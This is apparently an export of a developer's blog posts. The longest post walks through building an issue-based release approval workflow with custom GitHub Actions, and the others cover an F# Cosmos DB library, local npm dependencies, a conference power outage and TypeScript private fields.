This gives me a level of control against accidental pushes to master, and I handle this through Azure Pipelines, which supports a simple approval flow: clicking an “approve” button.\nBut at the moment GitHub Actions doesn’t have functionality to do approvals, so I have created my own! If you just want to see the final pieces here’s the build workflow and release workflow, but you’ll want to read on to understand how they work. 😊\nDefining Our Workflow The idea behind this workflow is something that I think is rather common in open source projects: I want to have the build and package as a single workflow, with the assets made available for people to consume and test; then, based on feedback (the release is good or not), it’ll be “promoted” to an official package repository, a GitHub Release is created, commits are tagged, all that sort of thing.\nThe build is going to be pretty straightforward, I’m using FAKE to script up the build workflow and I’m using a changelog following Keep A Changelog to define a release and its details. The job looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 jobs: build: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@master - name: Setup Dotnet ${{ env.DOTNET_VERSION }} uses: actions/setup-dotnet@v1 with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Restore dotnet tools run: dotnet tool restore - name: Generate packages run: dotnet fake run ./build.fsx --target Release Now that I’ve got my artifacts I want to set up some metadata to be made available, such as the version number from the changelog. To do this I’ve created a special FAKE task:\n1 2 3 4 5 6 7 let getChangelog() = let changelog = "CHANGELOG.md" |> Changelog.load changelog.LatestEntry Target.create "SetVersionForCI" (fun _ -> let changelog = getChangelog() printfn "::set-env name=package_version::%s" changelog.NuGetVersion) Notice how it does printfn of ::set-env? This is how you create your own environment variables and it conveniently works from anywhere that writes to stdout.\nWith this ready we can add it to the workflow:\n1 2 3 4 5 6 7 8 - name: Set Version run: dotnet fake run ./build.fsx --target SetVersionForCI - name: Create version file run: echo ${{ env.package_version }} >> ${{ env.OUTPUT_PATH }}/version.txt - name: Publish release packages uses: actions/upload-artifact@v1 Approvals Through GitHub Issues When I was thinking about how to do approvals I was thinking “What in GitHub would you use to discuss and approve something?” and there’s an obvious answer, Issues! My thought is that if I can automate the creation of an issue and label it appropriately I can then use the GitHub Actions trigger of Issue Labeled to monitor for a certain label to kick things off. In my case, I’m going to have a label of release-approved and once that label is applied I want to run the workflow to release the packages.\nCreating Issues With GitHub Actions If you look on the Actions Marketplace there’s plenty of Actions for creating an issue, but I am going to have a few weird requirements so I decided to build my own (also, I hadn’t built my own Action so this was another good chance to learn).
This (and the others we’ll build) are part of my git repo and not on the marketplace, so they’ll live in the .github/actions folder, alongside the workflows and they’ll be written in TypeScript.\nFirst off I’d recommend that you read how to create an Action if you’ve not done one before as it’ll talk through the setup guide and the files you’ll need.\nBecause we’ll be working with GitHub Issues we’ll need an access token, which is conveniently available as a secret variable of secrets.GITHUB_TOKEN and I’m going to pass in two more arguments, the ID of the current action (github.run_id) and the version of the release (env.package_version).\nWe’ll start by creating our empty action:\n1 2 3 4 5 6 7 import * as core from "@actions/core"; import * as github from "@actions/github"; import * as fs from "fs"; async function run() {} run(); And now we can start populating the run function:\n1 2 3 4 5 6 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; } This gives us access to the GitHub API via octokit. Now I want the changelog as I want to dump that into the body of the issue we’re creating (so while approving I can work out what is in the release):\n1 2 3 4 5 6 7 8 9 10 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; const changelog = fs.readFileSync("./.nupkg/changelog.md", { encoding: "UTF8", }); } Note: This file is created by one of my FAKE tasks and only contains the current version changelog, not the full history, like the root CHANGELOG.md contains.\nNow to create the issue:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; const changelog = fs.readFileSync("./.nupkg/changelog.md", { encoding: "UTF8", }); const newIssue = await octokit.issues.create({ ...context.repo, labels: [`awaiting-review`, "release-candidate"], title: `Release ${core.getInput("package-version")} ready for review`, body: `# :rocket: Release ${core.getInput( "package-version" )} ready for review ## Changelog --- ${changelog} `, }); } Because we have context.repo to give us the information about the current GitHub repo I just spread (...context.repo) that onto the input of octokit.issues.create and then give it a few more pieces of information, the labels of awaiting-review and release-candidate, a title and the body, which contains the changelog. These labels are useful for me to create filters in GitHub Issues and I can look for them in a future workflow.\nAnd now we’re done, it’s time to plug it into our build workflow:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 - name: Prepare create release issue action uses: actions/setup-node@v1 with: node-version: "12.x" - name: Building Action run: npm i && npm run build working-directory: ./.github/actions/create-issue - name: Create Release Issue uses: ./.github/actions/create-issue with: token: ${{ secrets.GITHUB_TOKEN }} action-id: ${{ github.run_id }} package-version: ${{ env.package_version }} Since I chose to do these a TypeScript I have to add 2 additional steps to the workflow, one to setup Node.js and one to compile the Action, but the important stuff is in the 3rd Action. 
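(A small note on the run() skeleton from earlier: as written it swallows any error, so a failed run would still show the step as green. A common pattern, and an assumption on my part rather than something the repo does, is to catch the error and report it with core.setFailed:)

```typescript
import * as core from "@actions/core";

async function run(): Promise<void> {
  // ... issue creation logic from above goes here ...
}

run().catch((error: Error) => {
  // Marks the step as failed and surfaces the message in the workflow log.
  core.setFailed(error.message);
});
```

Back to that third step in the workflow.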
As it’s a local Action the use points to the directory that it lives in, which is an absolute path from the root of the git repo (so you don’t have to use .github/actions, but I like to keep them all together).\nAnd there we go, the workflow creates our issue (yes it’s closed because I approved it already 😉):\nApproving Releases This proved to be a bit tricker than I had hoped, so I hope that this will help you avoid some of the challenges I hit with this step. First off, we’re using the Issue Labeled event in GitHub Actions which will trigger every time you label an issue, so if you use issues heavily your Action history will likely become quite noisy. This means that you’ll need to think of a way to only run when the right label is added, so to do that I created an Action to check if an issue has a specific label:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 import * as core from "@actions/core"; import * as github from "@actions/github"; async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; if (!context.payload.issue) { throw new Error("This should not happen"); } const issue = await octokit.issues.get({ ...context.repo, issue_number: context.payload.issue.number, }); core.setOutput( "exists", issue.data.labels .some((label) => label.name === core.getInput("label")) .toString() ); } run(); The Action is reasonably straight forward, it’ll grab the issue that triggered the workflow from the Action context and look if the label passed into the Action was present and set an output parameter indicating its presence. We’ll use the Action like so:\n1 2 3 4 5 6 - name: Check issue was release issue uses: ./.github/actions/check-issue id: check-issue with: token: ${{ secrets.GITHUB_TOKEN }} label: release-candidate Remember to install the packages and build the Action first, I’ve just skipped that for brevity here.\nThe problem is though that now every Action after this we need to check the output to decide if we want to run it, meaning we add if: steps.check-issue.outputs.exists == 'true' to every Action, which is annoying. If someone knows how to improve that I’m all ears!\nGetting Release Artifacts Since the build phase generated the artifacts and we might’ve run a number of workflows since then we need to get the right artifacts. In the past I’ve used upload-artifact and download-artifact to handle this (and in the build workflow I used upload-artifact) but here’s the problem, the download expects to download from the current workflow, but I’m not in the workflow that the artifact was created, I’m on a completely new one, so how do I know what artifacts to get?\nTo do this we’re going to update the create-issue Action we created earlier to include the ID of the Action in it somewhere. Initially, I thought to do this as a label, so you would have a label like actionid: <id>, but on a busy repository it’s likely that that will become annoying quickly as each label is single use and they aren’t automatically deleted. So instead let’s create a comment on the issue with the Action ID. 
Right after we created the issue we’ll add this:\n1 2 3 4 5 await octokit.issues.createComment({ ...context.repo, issue_number: newIssue.data.number, body: `Action: ${core.getInput("action-id")}`, }); With the comment appended we’ll create another Action to extract it, I called this get-action-id:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import * as core from "@actions/core"; import * as github from "@actions/github"; async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; if (!context.payload.issue) { throw new Error("This should not happen"); } const comments = await octokit.issues.listComments({ ...context.repo, issue_number: context.payload.issue.number, }); const actionComment = comments.data.find( (comment) => comment.body.indexOf("Action: ") >= 0 ); if (!actionComment) { throw new Error("No comment found that has the right pattern"); } core.setOutput("id", actionComment.body.replace("Action: ", "").trim()); } run(); Again this is all happening in the context of an issue so we know where to look up the comments, which we do with octokit.issues.listComments and then from that we’ll look for a comment that matches the pattern we expect, to start with Action:. If that’s found we can pull the ID out of it and push it as an output variable!\n1 2 3 4 5 6 - name: Get the ID of the Action uses: ./.github/actions/get-action-id if: steps.check-issue.outputs.exists == 'true' id: get-action-id with: token: ${{ secrets.GITHUB_TOKEN }} With the Action ID in hand we now can download the Actions, and for this I decided to be lazy and just write an inline bash script:\n1 2 3 4 5 6 7 8 9 10 11 12 - name: Download packages if: steps.check-issue.outputs.exists == 'true' run: | echo ${{ steps.get-action-id.outputs.id }} mkdir ${{ env.OUTPUT_PATH }} cd ${{ env.OUTPUT_PATH }} curl https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/runs/${{ steps.get-action-id.outputs.id }}/artifacts --output artifacts.json downloadUrl=$(cat artifacts.json | jq -c '.artifacts[] | select(.name == "packages") | .archive_download_url' | tr -d '"') echo $downloadUrl curl $downloadUrl --output packages.zip --user octocat:${{ secrets.GITHUB_TOKEN }} --verbose --location unzip packages.zip ls Ouch, that’s complex, let’s break it down. I start with a bit of diagnostics info so I can see what the Action ID is and then create the location I want to dump the files into. 
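(As an aside, if you'd rather stay in TypeScript than shell out to curl and jq, the same lookup could be done from a custom Action with octokit's generic request method. Treat this as a rough sketch of the idea under my own assumptions, not code from the repo:)

```typescript
import * as github from "@actions/github";

async function findPackagesDownloadUrl(token: string, runId: string): Promise<string> {
  const octokit = new github.GitHub(token);

  // Same endpoint the bash script curls: list the artifacts of the original workflow run.
  const response = await octokit.request(
    `GET /repos/aaronpowell/FSharp.CosmosDb/actions/runs/${runId}/artifacts`
  );

  // Mirror the jq filter: find the artifact named "packages" and take its download URL.
  const artifact = response.data.artifacts.find(
    (a: { name: string; archive_download_url: string }) => a.name === "packages"
  );
  if (!artifact) {
    throw new Error("No artifact named 'packages' on that run");
  }
  return artifact.archive_download_url;
}
```

The bash version works perfectly well though, so let's keep unpacking it.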
Next we need to get the info about the artifacts for the release:\n1 curl https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/runs/${{ steps.get-action-id.outputs.id }}/artifacts --output artifacts.json We’re grabbing the output of the previous step and making a call to the GitHub API and getting back a JSON like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 { "total_count": 1, "artifacts": [ { "id": 2861674, "node_id": "MDg6QXJ0aWZhY3QyODYxNjc0", "name": "packages", "size_in_bytes": 39715, "url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/artifacts/2861674", "archive_download_url": "https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/artifacts/2861674/zip", "expired": false, "created_at": "2020-03-13T03:37:13Z", "updated_at": "2020-03-13T03:37:14Z" } ] } I want the archive_download_url from the artifact named packages, and to do that I’ve again been tricky and used jq to find it:\n1 downloadUrl=$(cat artifacts.json | jq -c '.artifacts[] | select(.name == "packages") | .archive_download_url' | tr -d '"') Since this would have the " around it I use tr to strip them as well.\nLastly, we download the zip package from that location using curl, but you need to authenticate this request so we pass the --user octocat:${{ secrets.GITHUB_TOKEN }} to curl as well as --location to tell it to follow the 302 redirect. And with the package downloaded we can unzip it and I just run ls to do some more logging.\nPublishing To NuGet With the packages downloaded we can start pushing them to the various feeds, let’s start with NuGet. I didn’t feel the need to use a 3rd party Action for this since you only need to run dotnet nuget push (Note: you will need a NuGet access token, so pop one in your secrets), but what I did need to know was what was the version number to put into the file path when publishing.\nThankfully, I created a file that I pushed into the artifacts list called version.txt that contains the version number from CHANGELOG.md. Let’s turn that into an environment variable:\n1 2 3 4 5 6 - name: Get release version if: steps.check-issue.outputs.exists == 'true' working-directory: ${{ env.OUTPUT_PATH }} run: | version=$(cat version.txt) echo "::set-env name=package_version::$version" Good ol’ cat to the rescue. Then we can setup the dotnet environment and push to NuGet:\n1 2 3 4 5 6 7 8 9 10 11 12 - name: Setup Dotnet ${{ env.DOTNET_VERSION }} uses: actions/setup-dotnet@v1 if: steps.check-issue.outputs.exists == 'true' with: dotnet-version: ${{ env.DOTNET_VERSION }} - name: Push NuGet Package if: steps.check-issue.outputs.exists == 'true' working-directory: ${{ env.OUTPUT_PATH }} run: | dotnet nuget push FSharp.CosmosDb.${{ env.package_version }}.nupkg --api-key ${{ secrets.NUGET_KEY }} --source ${{ env.NUGET_SOURCE }} dotnet nuget push FSharp.CosmosDb.Analyzer.${{ env.package_version }}.nupkg --api-key ${{ secrets.NUGET_KEY }} --source ${{ env.NUGET_SOURCE }} And with that we have packages on NuGet.\nCutting a Release The last thing to do is create a GitHub Release, which will mean we need to know what SHA the build was triggered from. 
Initially, I thought to do this by added it to the comments of the issue (which I do still do) but then I realised that I know the ID of the original workflow so I can just pull the metadata from there:\n1 2 3 4 5 6 7 8 - name: Get Action sha if: steps.check-issue.outputs.exists == 'true' run: | echo ${{ steps.get-action-id.outputs.id }} cd ${{ env.OUTPUT_PATH }} curl https://api.github.com/repos/aaronpowell/FSharp.CosmosDb/actions/runs/${{ steps.get-action-id.outputs.id }} --output run.json action_sha=$(cat run.json | jq -c '.head_sha' | tr -d '"') echo "::set-env name=action_sha::$action_sha" Again there’s a bit of jq parsing of output to find it, but now we have the full SHA in an environment variable, so we can create the release, which I’ve defined a custom Action for (mainly to fit the way I want it structured, but you could use one from the marketplace if you prefer).\nThis time let’s look at the usage of the Action first:\n1 2 3 4 5 6 7 8 - name: Cut GitHub Release uses: ./.github/actions/github-release if: steps.check-issue.outputs.exists == 'true' with: token: ${{ secrets.GITHUB_TOKEN }} sha: ${{ env.action_sha }} version: ${{ env.package_version }} path: ${{ env.OUTPUT_PATH }} The result of running it will see an Release like this:\nThis Action we’ll create the release for the right SHA then upload the files to it (I don’t pass in the files, I’m hard-coding them), so let’s look at the run function:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 async function run() { const token = core.getInput("token"); const sha = core.getInput("sha"); const version = core.getInput("version"); const artifactPath = core.getInput("path"); const releaseNotes = readFileSync(join(artifactPath, "changelog.md"), { encoding: "UTF8", }); const octokit = new github.GitHub(token); const context = github.context; const release = await octokit.repos.createRelease({ ...context.repo, tag_name: version, target_commitish: sha, name: `Release ${version}`, body: releaseNotes, }); await upload( octokit, context, release.data.upload_url, join(artifactPath, `FSharp.CosmosDb.${version}.nupkg`) ); await upload( octokit, context, release.data.upload_url, join(artifactPath, `FSharp.CosmosDb.Analyzer.${version}.nupkg`) ); } The octokit.repos.createRelease is our first main step, we use the current context to set the repository info and then set the tag_name to the version defined in our changelog and the target_commitish to the right SHA, which will create the git tag for us (nice!) and then we set the title and finally the body I’m just injecting the changelog in (which will force me to write a decent changelog!).\nWhen it comes to attaching files to a release, this is something you need to do for each file once the release is created, as creating the release gives you an upload_url for where the files need to be POST’ed to. 
Since I do this multiple times I pulled out a function to handle it called upload:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 async function upload( octokit: github.GitHub, context: Context, url: string, path: string ) { let { name, mime, size, file } = fileInfo(path); console.log(`Uploading ${name}...`); await octokit.repos.uploadReleaseAsset({ ...context.repo, name, file, url, headers: { "content-length": size, "content-type": mime, }, }); } This uses the octokit.repos.uploadReleaseAsset function to send the file and we need to provide it with the size (content-length) and the mime type (content-type), which I get through a function that grabs the file information called fileInfo:\n1 2 3 4 5 6 7 8 9 10 11 12 function mimeOrDefault(path: string) { return getType(path) || "application/octet-stream"; } function fileInfo(path: string) { return { name: basename(path), mime: mimeOrDefault(path), size: lstatSync(path).size, file: readFileSync(path), }; } To get the mime type I use the mime npm package, but I could’ve hard-coded it since I’m hard-coding the files anyway, but that was just a habit. Otherwise I’m using lstatSync and readFileSync from Node’s fs module.\nAnd with that the Release is created and the packages are available for people to manually download if they don’t want to use NuGet for some reason.\nClosing The Issue The last thing I wanted to automate is the closing of the issue being used to manage the workflow. By now I was on a roll of creating custom Actions so I created another one (I also didn’t find one for just closing an issue, they were all for stale issues or PR’s, but maybe I didn’t look hard enough).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 async function run() { const token = core.getInput("token"); const octokit = new github.GitHub(token); const context = github.context; if (!context.payload.issue) { throw new Error("This should not happen"); } await octokit.issues.createComment({ ...context.repo, issue_number: context.payload.issue.number, body: core.getInput("message"), }); await octokit.issues.update({ ...context.repo, issue_number: context.payload.issue.number, state: "closed", }); } For convenience we’re adding a comment to the issue using a provided message, done via octokit.issues.createComment, and then updating the issue status using octokit.issues.update and setting the state: "closed". From our workflow file we can then use it like this:\n1 2 3 4 5 6 7 8 9 10 11 - name: Close issue uses: ./.github/actions/close-issue if: steps.check-issue.outputs.exists == 'true' with: token: ${{ secrets.GITHUB_TOKEN }} message: | The release has been approved and has been * Deployed to NuGet * Created as a Release on the repo * Commit has been tagged And with that, once the issue is labelled with release-approved my interactions are done!\nConclusion My goal at the start was to create an approval based workflow with GitHub Actions and I’m pretty happy that I was able to get it done. You can find the most recent (at the time of writing) build and release runs through, and if you look into the closed issues you’ll find them there too.\nIt is a little cumbersome though, without built-in approval support there was a lot of custom Actions I ended up writing (my repo now reports 10% of the codebase is TypeScript 🤣) so I hope it’s a feature on their roadmap.\nAlso, it’s not 100% fool-proof. 
At the moment I don’t check the labels properly, it should check for the release-approved label as well as release-candidate, because if I was to put a different label it’ll just run through. But since I’m the only contributor here I’m less concerned about that at the moment.\nOverall I’m happy with how it works and I hope it gives you an insight into how you too can have an approval-based workflow using GitHub Actions.\n", "id": "2020-03-23-approval-workflows-with-github-actions" }, { "title": "Introducing FSharp.CosmosDb", "url": "https://www.aaron-powell.com/posts/2020-03-16-introducing-fsharp-cosmosdb/", "date": "Mon, 16 Mar 2020 20:19:50 +1100", "tags": [ "fsharp", "azure", "cosmosdb" ], "description": "Introducing a library to make Cosmos DB easier with F#", "content": "I’ve recently been doing some work with Cosmos DB and not just because there was a free tier announced at the start of March (although that’s appealing! 😉).\nOne of the main use cases I have for it is to replace the Table Storage backend of my IoT project with something a bit more flexible, and this means that I’m writing F#.\nCosmos DB for .NET When it comes to working with Cosmos DB in .NET the Azure SDK team is working on a v4 SDK that I decided to use (even though it’s still in preview).\nUnfortunately, the SDK doesn’t feel particularly friendly to F# developers, mainly because it relies on the .NET Task API rather than F#’s Async, so I wanted to make something that felt a bit more like F# code.\nIntroducing FSharp.CosmosDb To this end I’ve created FSharp.CosmosDb, a wrapper API over the top of the .NET SDK. The initial release is up on NuGet and currently supports querying for data:\n1 2 3 4 5 6 7 8 9 10 11 12 13 open FSharp.CosmosDb let host = "https://..." let key = "..." let findUsers() = host |> Cosmos.host |> Cosmos.connect key |> Cosmos.database "UserDb" |> Cosmos.container "UserContainer" |> Cosmos.query "SELECT u.FirstName, u.LastName FROM u WHERE u.LastName = @name" |> Cosmos.parameters [ "name", box "Powell" ] |> Cosmos.execAsync<User> Breaking It Down Here we’ve got a pipe-able API, starting with the host endpoint for our Cosmos instance, then providing the authorisation key. This will allow us to setup a connection to Cosmos and then we can start working with it. Then we can specify the database and container that we’ll work with before writing a query and providing parameters (if required).\nThe last step is Cosmos.execAsync<'T> which takes a type argument that we want to unpack our query results into. This will provide an AsyncSeq for you to iterate over asynchronously. Until you run Cosmos.execAsync<'T> nothing has happened with Cosmos, in fact, it uses a record type to wrap up the information provided so you can pass it around easily.\nSome Notes This first version is a little rough around the edges, I won’t deny that, so here’s a few things to be aware of:\nThe argument for Cosmos.parameters is (string * object) list so you have to box the value argument. This is because the underlying API takes an object value, but if anyone can think a better approach let me know If the type provided to execAsync is a record type it must be marked as [<CLIMutable>]. I need to find a way to work around that so we can use plain record types It doesn’t support connection string connections, only host + key access (easy fix, just requires some time) I haven’t written docs yet, sorry! 
Conclusion I hope you find this useful. I’m going to keep plugging away at adding features to the API and make it more feature-compatible with the full .NET SDK. In the meantime, if you try it out let me know what you think. 😊\n", "id": "2020-03-16-introducing-fsharp-cosmosdb" }, { "title": "Making it Easier to Work With Local npm Packages", "url": "https://www.aaron-powell.com/posts/2020-03-02-making-it-easier-to-work-with-local-npm-packages/", "date": "Mon, 02 Mar 2020 08:16:08 +1100", "tags": [ "nodejs" ], "description": "A nifty trick I learnt recently for working with local npm packages", "content": "I was recently doing some work to fix a bug in the Azure Functions Durable JavaScript package that required changing the surface area of an API. I’d done everything I could to test it: I’d created a new sample, added a unit test for the bug I’d hit and ensured it passed while not breaking the existing tests over the API, all that sort of thing. But I wanted to make sure that the change, while seemingly fixing my issue, would actually fix it, so I wanted to drop the code into the project.\nSo I’ve got two git repos on my machine, one with my application in it and one with the updated Azure Functions code, and I want to use the latter over the package that would come down from npm when I do an npm install.\nWhen you look at npm’s docs it says that I should be using npm link to set up a symlink between the code I want and the node_modules folder in my application, but I’ve always struggled to get it working right, and that’s probably because symlinks on Windows aren’t quite as simple as on *nix (and maybe I’ve been burnt too many times to trust them! 🤣).\nBut I found a simpler solution! It turns out that in your package.json’s dependencies (and devDependencies), rather than specifying a package version, you can specify a file system path, like so:\n{ ... "dependencies": { "durable-functions": "file:../azure-functions-durable-js", ... } ... } The path points to where the package.json of the dependency lives, and the file: prefix tells the dependency resolver to use that file system path rather than a published package, so npm install knows not to download anything from the registry for it.\nUsing this pattern can also be useful for samples within a repo, as the sample can refer to the package by name (import something from 'my-package';) rather than using relative paths within the sample files (import something from '../../';), which makes the samples match how someone would actually consume the package.\nIt can also be useful to verify that your change really does fix the bug you found, by redirecting where your project resolves the package from without changing your codebase itself.\nI hope this has been a helpful tip and can make it easier for you to work with local packages and also make it easier to test fixes you want to contribute.
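To make the consuming side concrete, this is roughly what it looks like from the application once that file: entry is in place; the snippet is my own illustration built around the package named in the post:

```typescript
// index.ts in the application repo - nothing in the code knows the dependency is local.
// With "durable-functions": "file:../azure-functions-durable-js" in package.json,
// this import resolves to the sibling checkout rather than the copy from the registry,
// so the locally patched code is what actually runs.
import * as df from "durable-functions";

console.log(Object.keys(df)); // quick sanity check that the local build loaded
```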
There’s more information on npm’s docs about this and the other kinds of special paths you can define, such as git repos and HTTP endpoints.\n", "id": "2020-03-02-making-it-easier-to-work-with-local-npm-packages" }, { "title": "Using GitHub Actions With Azure Functions", "url": "https://www.aaron-powell.com/posts/2020-02-28-using-github-actions-with-azure-functions/", "date": "Fri, 28 Feb 2020 09:55:55 +1100", "tags": [ "serverless", "azure", "devops", "azure-functions" ], "description": "I'm back on Visual Studio Toolbox to talk about GitHub Actions and Azure Functions", "content": "I’m back on the Visual Studio Toolbox show and this time we’re looking at the application we worked with in the last video but add a bit of DevOps on it using GitHub Actions!\nI’ve blogged about how to use GitHub Actions with Azure Functions in the past, but that was looking at .NET functions and in this video we’ll look at JavaScript Azure Functions.\nEnjoy!\n", "id": "2020-02-28-using-github-actions-with-azure-functions" }, { "title": "Presenting in the Dark - a Speakers Nightmare", "url": "https://www.aaron-powell.com/posts/2020-02-17-presenting-in-the-dark-a-speakers-nightmare/", "date": "Mon, 17 Feb 2020 11:10:59 +1100", "tags": [ "speaking" ], "description": "When a talk goes bad.", "content": "When you lose power bar emergency lighting mid live-coding demo. Oops ;) #MSIgniteTheTour pic.twitter.com/Dp7HpdvZUQ\n— Matt Brown (@stillaslifematt) February 13, 2020 *Record Scratch*\n*Freeze Frame*\nYep, that’s me. You’re probably wondering how I ended up in this situation.\nLast week at Microsoft Ignite The Tour Sydney I gave a talk and you might notice something odd about that photo, there’s no projector. Also, there’s no overhead lighting and you can’t tell from a picture, but the mic isn’t working.\nIt’s just me and an emergency lighting system.\nWhat Happened About 30 minutes into my session, MOD10 - Migrating Web Applications to Azure, I had just wrapped up a live demo in which I created a vnet using the Azure CLI. I’d stuffed up this demo because I failed to type one of the command line arguments correctly so after a few retries while the audience watched and offered solutions, I got it working.\nBut now the nervous speaker sweats were setting in and I made a joke that I wished the A/C was up a bit as it was getting warm on stage then, as if by fate, the room was plunged into darkness.\nThe Power Goes Out This is pretty much the worst-case scenario as a speaker, the room power is out (we had emergency lighting on and that’s all that lit me on stage), so the projectors are offline and my mic no longer works.\nAs a speaker you plan for failures. If your demo breaks you jump to one you prepared earlier. If the connectivity is poor you rely on a video of the demo. If your laptop crashes you wait for a reboot. There’s not much that can’t be recovered from during a talk if you’ve done some planning.\nBut the power going out, that’s a bit different.\nThe Powers Out, What Next There was 15 minutes left in the talk, I’ve got a few hundred people in the room and all I had left were live demos, so what do I do next?\nThankfully, a power outage actually gave me a moment to think, as the room is in a state of confusion, I started to process my options. In my peripheral vision I could see the AV tech checking the cables coming to the stage but it’s clear that that’s not the problem and they likely have no more information than I do. 
I decided that going over and talking to them wasn’t going to do anything more than delay a resolution and increase the stress they are likely feeling already.\nSo what should I do? Should I kick everyone out? Well, there’s still 15 minutes left and the optimist in me thinks that the power will come back on and I really want to finish this talk.\nInstead, I decided to have some fun and fall back on my core speaking knowledge, that the slides and demos are only there to supplement the talk, and I should be able to present the story without them.\nIt’s Time for Interpretive Dance Well, not literally. After a quick apology and a suggestion that if people wanted to leave, they could, I picked the talk up from where it had been before the power went out and started describing the next steps. With my laptop still powered on I started creating a VM in Azure (the next demo I had to do) and explained the information you need to provide, the options that appear, the configuration, etc.\nThere was a lot of hand waving and a lot of me projecting my voice as loud as I could (it was a long room) but my intent was to give people enough of an idea of what they would see in the portal should they want to do the demo themselves.\nBut I had another reason to keep going, to try and reduce stress for the AV folks. I had no doubt that they were stressing out on the fact that the room had lost power but if I was to constantly throw looks their way or pointing towards them in any negative fashion (whether in jest or not) wasn’t going to help speed things up. After all, they are doing the best they can to resolve the issues, the least I can do is be professional and let them do their job.\nAfter about 10 minutes it was clear that power wasn’t going to be restored for the remaining 5 minutes so I wrapped up the session, thanked everyone for coming, promised to share the links to demos, slides and a recording so people could see what they missed and called it a day.\nI was surprised that not many people left as a result of the power outage, maybe they were hoping it’d come back on or maybe they were watching with morbid curiosity on how the last 15 minutes would turn out, who knows!\nThe Aftermath I had a few people come up to me and applaud my efforts to keep going given the circumstances and then speaking with the AV person it turns out that half the floor we were on lost power and no one knew why!\nIn the end it was a fun adrenalin rush, I’ve now had a chance to see how I’d really go under pressure, there’s not many other possible failures during a talk that could be worse and hey, it’s a good story to tell! And hey, I know I can power through just about anything that goes wrong during a talk. 🤣\nBut I must admit that the next time I give that talk I do hope to have power for the whole 45 minutes. 😉\n", "id": "2020-02-17-presenting-in-the-dark-a-speakers-nightmare" }, { "title": "Creating Functions With VS Code", "url": "https://www.aaron-powell.com/posts/2020-02-17-creating-functions-with-vscode/", "date": "Mon, 17 Feb 2020 10:58:18 +1100", "tags": [ "serverless", "azure", "vscode", "git" ], "description": "A quick guide on how to use VS Code to work with Git and Azure Functions", "content": "Recently I was in Redmond and was asked if I wanted to record a video for the Visual Studio Toolbox show. I jumped at the opportunity, not only because I haven’t had a chance to record at our studios, but because I’ve been working on a hands-on lab to get people more familiar with VS Code and Git. 
In this lab we fork a repository but then look at how we can do everything else within VS Code, from working with branches, handling merge conflicts and deploying to Azure (and while Damian my chastise me for right-click deployments there may be another video coming soon 😉).\nSo grab a free Azure trial and check out the video.\n", "id": "2020-02-17-creating-functions-with-vscode" }, { "title": "How do ECMAScript Private Fields Work in TypeScript?", "url": "https://www.aaron-powell.com/posts/2020-01-23-typescript-ecmascript-class-private-fields/", "date": "Thu, 23 Jan 2020 09:51:02 +1100", "tags": [ "javascript", "typescript", "web" ], "description": "Let's have a bit of a dig into how a new TypeScript feature works", "content": "I was reading the release notes for the TypeScript 3.8 beta the other day and there’s a particular feature in there that caught my eye, Private Fields. This is support for the stage 3 proposal which means it’s a candidate for inclusion in a future language version (more info on the stages can be found here).\nWhat I found interesting is that although TypeScript has supported a private keyword it doesn’t actually make the field private, it just tells the compiler, meaning that in “plain old JavaScript” you can still access the field, whereas the Private Fields implementation makes it properly truly private, you can’t access it. So how does TypeScript do this while still generating valid JavaScript? This was something I wanted to learn.\nThe easiest way to figure this out is to look at the generated JavaScript from the TypeScript compiler, so let’s start with the sample from the blog post:\n1 2 3 4 5 6 7 8 9 10 11 class Person { #name: string constructor(name: string) { this.#name = name; } greet() { console.log(`Hello, my name is ${this.#name}!`); } } You’ll see the new syntax in the #name field that indicates it’s a private field. If we pass this through the compiler we’ll get this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 "use strict"; var __classPrivateFieldSet = (this && this.__classPrivateFieldSet) || function(receiver, privateMap, value) { if (!privateMap.has(receiver)) { throw new TypeError( "attempted to set private field on non-instance" ); } privateMap.set(receiver, value); return value; }; var __classPrivateFieldGet = (this && this.__classPrivateFieldGet) || function(receiver, privateMap) { if (!privateMap.has(receiver)) { throw new TypeError( "attempted to get private field on non-instance" ); } return privateMap.get(receiver); }; var _name; class Person { constructor(name) { _name.set(this, void 0); __classPrivateFieldSet(this, _name, name); } greet() { console.log( `Hello, my name is ${__classPrivateFieldGet(this, _name)}!` ); } } _name = new WeakMap(); We’ll come back to the generated functions __classPrivateFieldSet and __classPrivateFieldGet shortly, let’s first look at the class:\n1 2 3 4 5 6 7 8 9 10 11 12 13 var _name; class Person { constructor(name) { _name.set(this, void 0); __classPrivateFieldSet(this, _name, name); } greet() { console.log( `Hello, my name is ${__classPrivateFieldGet(this, _name)}!` ); } } _name = new WeakMap(); Notice there’s a variable generated called _name that is an instance of a WeakMap. The WeakMap type in JavaScript is a special kind of key/value store that uses objects as the key, and we can see that in the constructor it calls _name.set(this, void 0);, so it’s initialising the value in the store to void 0 (which is a fancy way to write undefined). 
